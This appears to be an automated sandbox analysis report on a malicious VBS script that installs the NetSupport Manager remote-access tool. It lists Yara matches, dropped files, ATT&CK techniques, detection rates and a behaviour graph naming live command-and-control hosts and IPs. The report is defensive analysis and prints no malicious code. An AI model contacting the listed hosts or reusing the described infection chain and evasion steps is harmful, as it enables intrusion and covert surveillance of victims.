                                Source: Yara matchFile source: 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.115180363377.00000000019DA000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114023155070.0000000008E21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000000.114214666288.00000000007CA000.00000008.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.115177447611.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114047735822.000000000B674000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114080859440.0000000002970000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114023155070.0000000008C31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115069209517.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001B.00000002.114157116679.0000000000977000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000000.114217707443.0000000001047000.00000008.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000000.114259508895.0000000000BF7000.00000008.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114081033705.0000000002978000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114048065766.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115045720905.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000000.114135574095.0000000000637000.00000008.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.115188311380.000000006CD4D000.00000004.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115032887765.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115080634297.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.115102203122.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.114561669687.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114079820477.0000000002949000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000003.114264285056.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114080026944.000000000294C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.114078859397.0000000002945000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000000.114273328544.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000002.114313505526.000000000290A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\e6def9.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF1F8.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF314.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIE6B9.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\System32\drivers\nskbfltr.sys, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF2D5.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIEF23.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF917.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF691.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIE748.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI23B6.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF0BB.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF373.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIE708.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF869.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF8D7.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI37C0.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\System32\client32provider.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF238.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI1387.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF985.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF10A.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF179.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF1A9.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF149.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI23E6.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIF6C1.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\e6defa.msi, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\vrep[1].msi, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vrep.msi, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\e6def7.msi, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information221
                                Scripting                                		1
                                Replication Through Removable Media                                		631
                                Windows Management Instrumentation                                		221
                                Scripting                                		1
                                LSASS Driver                                		11
                                Disable or Modify Tools                                		21
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		3
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                LSASS Driver                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory11
                                Peripheral Device Discovery                                		Remote Desktop Protocol21
                                Input Capture                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		1
                                DLL Side-Loading                                		1
                                Access Token Manipulation                                		4
                                Obfuscated Files or Information                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares2
                                Clipboard Data                                		11
                                Non-Standard Port                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts22
                                Command and Scripting Interpreter                                		42
                                Windows Service                                		42
                                Windows Service                                		12
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object ModelInput Capture3
                                Non-Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		112
                                Process Injection                                		1
                                DLL Side-Loading                                		LSA Secrets157
                                System Information Discovery                                		SSHKeylogging114
                                Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media12
                                Service Execution                                		RC Scripts1
                                Scheduled Task/Job                                		1
                                File Deletion                                		Cached Domain Credentials2
                                Query Registry                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote Services1
                                PowerShell                                		Startup ItemsStartup Items132
                                Masquerading                                		DCSync1061
                                Security Software Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Modify Registry                                		Proc Filesystem66
                                Virtualization/Sandbox Evasion                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt66
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow2
                                Process Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                Access Token Manipulation                                		Network Sniffing11
                                Application Window Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
                                Process Injection                                		Input Capture1
                                System Owner/User Discovery                                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561295 Sample: Pyyidau.vbs Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 81 megaeth1337.duckdns.org 2->81 83 okolinabeauty.com 2->83 85 geo.netsupportsoftware.com 2->85 93 Multi AV Scanner detection for domain / URL 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 .NET source code contains potential unpacker 2->97 101 13 other signatures 2->101 9 msiexec.exe 203 231 2->9         started        13 wscript.exe 1 2->13         started        15 client32.exe 2->15         started        18 2 other processes 2->18 signatures3 99 Uses dynamic DNS services 81->99 process4 dnsIp5 71 C:\Windows\Installer\...\ARPPRODUCTICON.exe, PE32 9->71 dropped 73 C:\Windows\Installer\MSIFCA3.tmp, PE32 9->73 dropped 75 C:\Windows\Installer\MSIF985.tmp, PE32 9->75 dropped 79 158 other files (84 malicious) 9->79 dropped 129 Drops executables to the windows directory (C:\Windows) and starts them 9->129 131 Sample is not signed and drops a device driver 9->131 20 MSI1387.tmp 9->20         started        24 pcicfgui_client.exe 9->24         started        26 MSIF985.tmp 9->26         started        34 6 other processes 9->34 133 Malicious encrypted Powershell command line found 13->133 135 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->135 137 Suspicious execution chain found 13->137 139 Creates processes via WMI 13->139 28 Pyyidau.vbs.exe 3 17 13->28         started        89 megaeth1337.duckdns.org 185.170.144.66 VDWELLEREE unknown 15->89 91 geo.netsupportsoftware.com 104.26.1.231 CLOUDFLARENETUS United States 15->91 30 client32.exe 15->30         started        77 C:\Users\user\Desktop\Pyyidau.vbs.exe, PE32 18->77 dropped 32 conhost.exe 18->32         started        file6 signatures7 process8 file9 61 C:\Windows\SysWOW64\pcimsg.dll, PE32 20->61 dropped 103 Found stalling execution ending in API Sleep call 20->103 105 Contains functionality to automate explorer (e.g. start an application) 20->105 107 Enables network access during safeboot for specific services 20->107 36 winst64.exe 20->36         started        109 Hides threads from debuggers 24->109 111 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 24->111 40 pcicfgui_client.exe 24->40         started        63 C:\Users\user\...\50d669f573135aafd57c..vbs, ASCII 28->63 dropped 113 Potential malicious VBS script found (suspicious strings) 28->113 115 Potential malicious VBS script found (has network functionality) 28->115 117 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->117 121 3 other signatures 28->121 42 wscript.exe 22 28->42         started        45 conhost.exe 28->45         started        47 RegAsm.exe 28->47         started        55 9 other processes 28->55 119 Query firmware table information (likely to detect VMs) 30->119 49 cscript.exe 30->49         started        51 conhost.exe 34->51         started        53 attrib.exe 34->53         started        signatures10 process11 dnsIp12 65 C:\Windows\System32\drivers\nskbfltr2.sys, PE32+ 36->65 dropped 67 C:\Windows\System32\drivers\nskbfltr.sys, PE32+ 36->67 dropped 69 C:\Windows\System32\client32provider.dll, PE32+ 36->69 dropped 123 Sample is not signed and drops a device driver 36->123 87 okolinabeauty.com 176.126.113.166, 443, 49742, 49743 SAARGATE-ASVSENETGmbHDE Ukraine 42->87 125 System process connects to network (likely due to code injection or exploit) 42->125 127 Windows Scripting host queries suspicious COM object (likely to drop second stage) 42->127 57 msiexec.exe 42->57         started        59 conhost.exe 49->59         started        file13 signatures14 process15

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Pyyidau.vbs16%ReversingLabsScript-WScript.Trojan.Snake
                                Pyyidau.vbs26%VirustotalBrowse

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXE3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exe5%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL5%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL8%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe12%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dll4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sys2%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exe8%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe3%ReversingLabs
